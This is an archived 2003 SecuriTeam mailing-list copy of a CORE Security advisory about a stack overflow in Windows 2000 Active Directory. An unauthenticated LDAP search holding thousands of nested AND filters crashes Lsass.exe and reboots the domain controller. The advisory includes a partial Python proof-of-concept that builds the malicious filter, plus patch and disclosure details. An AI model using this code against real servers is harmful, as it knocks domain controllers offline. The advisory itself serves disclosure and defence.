[NT] Active Directory Stack Overflow
From: SecuriTeam (support_at_securiteam.com)
Date: 07/06/03
- Previous message: SecuriTeam: "[NT] NetMeeting Directory Traversal Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 6 Jul 2003 20:06:48 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security in Canada
Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
We welcome ISPs, system integrators and IT systems resellers
to promote the most advanced vulnerability assessment solutions today.
Contact us at 416-482-0038 or at canadasales@beyondsecurity.com
- - - - - - - - -
Active Directory Stack Overflow
------------------------------------------------------------------------
SUMMARY
Active Directory, which is an essential component of the Windows 2000
architecture, presents organizations with a directory service designed for
distributed computing environments. Active Directory allows organizations
to centrally manage and share information on network resources and users
while acting as the central authority for network security.
The directory services provided by Active Directory are based on the
Lightweight Directory Access Protocol (LDAP) and thus Active Directory
objects can be stored and retrieved using the LDAP protocol.
A vulnerability in Active Directory allows an attacker to crash and force
a reboot of any Windows 2000 Server running the Active Directory service.
The vulnerability can be triggered when an LDAP version 3 search request
with more than 1000 "AND" statements are sent to the server, resulting in
a stack overflow and subsequent crash of the Lsaas.exe service.
This in turn, will force a domain controller to stop responding, thus
making possible a denial of service attack against it. The LDAP request
does not need to be authenticated.
The possibility of exploiting this vulnerability to execute arbitrary code
on a vulnerable server has not been proved but is not discarded.
DETAILS
Vulnerable systems:
* Windows 2000 Server with Active Directory (Service Pack 3).
Immune systems:
* Windows 2000 Server with Active Directory (Service Pack 4).
Technical Description - Exploit/Concept Code:
A 'search request' created using LDAP version 3, constructed with more
than 1000 "AND"s, will provoke a stack overflow, making the Lsass.exe
service crash and rebooting the machine within 30 seconds.
To reproduce the stack overflow, you need to create a 'search request' to
an Active Directory server. The 'search request' must search for a non
existent machine within the Domain Controller that you've previously bind
to.
It must be composed with more than 1000 AND statements but it is supposed
that OR, GE, LE and other binary operators will yield the same results.
Example of a Python script that creates such a request:
----------------------------------------
class ActiveDirectoryDOS( Ldap ):
def __init__(self):
self._s = None
self.host = '192.168.0.1'
self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
self.port = 389
self.buffer = ''
self.msg_id = 1
Ldap.__init__()
def generateFilter_BinaryOp( self, filter ):
filterBuffer = asn1.OCTETSTRING(filter[1]).encode() +
asn1.OCTETSTRING(filter[2]).encode()
filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
return filterBuffer
def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
simpleBinOp = self.generateFilter_BinaryOp( filter )
filterBuffer = simpleBinOp
for cnt in range( 0, numTimes ):
filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND,
filterBuffer + simpleBinOp )
return filterBuffer
def searchSub( self, filterBuffer ):
self.bindRequest()
self.searchRequest( filterBuffer )
def run(self, host = '', basedn = '', name = '' ):
# the machine must not exist
machine_name = 'xaxax'
filterComputerNotInDir =
(Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)
# execute the anonymous query
print 'executing query'
filterBuffer = self.generateFilter_RecursiveBinaryOp(
filterComputerNotInDir, 7000 )
self.searchSub( filterBuffer )
----------------------------------------
Solution/Vendor Information/Workaround:
This issue is fixed in Windows 2000 Service Pack 4, which can be dowloaded
from: <http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/>
http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/
Further information about the vulnerability can be obtained from:
<http://support.microsoft.com/default.aspx?kbid=319709>
http://support.microsoft.com/default.aspx?kbid=319709
Vendors contacted:
- Microsoft
. Core Notification: 2003-05-16
. Notification acknowledged by Microsoft: 2003-05-19
. Issue fixed in Windows 2000 Service Pack 4: 2003-06-26
ADDITIONAL INFORMATION
The original advisory can be downloaded from:
<http://www.coresecurity.com/common/showdoc.php?idx=351&idxseccion=10>
http://www.coresecurity.com/common/showdoc.php?idx=351&idxseccion=10
The information has been provided by <mailto:advisories@coresecurity.com>
CORE Security Technologies Advisories.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] NetMeeting Directory Traversal Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
